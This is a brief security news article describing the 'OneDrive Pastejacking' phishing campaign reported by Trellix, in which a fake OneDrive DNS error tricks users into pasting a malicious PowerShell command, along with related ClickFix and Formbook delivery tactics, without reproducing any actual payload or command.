Cybersecurity researchers have spotted a new phishing trick aimed at Microsoft OneDrive users.
Cybersecurity company Trellix calls this scheme “OneDrive Pastejacking. Trellix security researcher Rafael Pena said that this uses clever social engineering tactics to deceive users into executing a PowerShell script, thereby compromising their systems.
The scam starts with an email that has an HTML file. When you open it, you see a fake OneDrive page with an error message about a DNS problem. It says: “Failed to connect to the ‘OneDrive’ cloud service. To fix the error, you need to update the DNS cache manually.”
The message also comes with two options, namely “How to fix” and “Details,” with the latter directing the email recipient to a legitimate Microsoft Learn page on Troubleshooting DNS. If users select the “How to fix” option, they’re led through a series of steps. The instructions guide them to access the Quick Link menu using the “Windows Key + X” shortcut, then open PowerShell. The final step asks them to paste a Base64-encoded command, claiming it will resolve the issue. In reality, this command is malicious, it downloads and launches harmful software on the victim’s machine, compromising their system security.
This scam has been seen in many countries like the U.S., South Korea, Germany, and the U.K.
Other security companies have reported similar tricks called ClickFix. This shows that these kinds of attacks are becoming more common. Threat actors keep coming up with new ways to get past Secure Email Gateways (SEGs).
One recent trick hides HTML payloads as MPEG files inside ZIP archives to deliver the Formbook malware using DBatLoader. These changing tactics show the ongoing back-and-forth between cybercriminals and security experts. This means we need to stay alert and keep our security measures up to date.
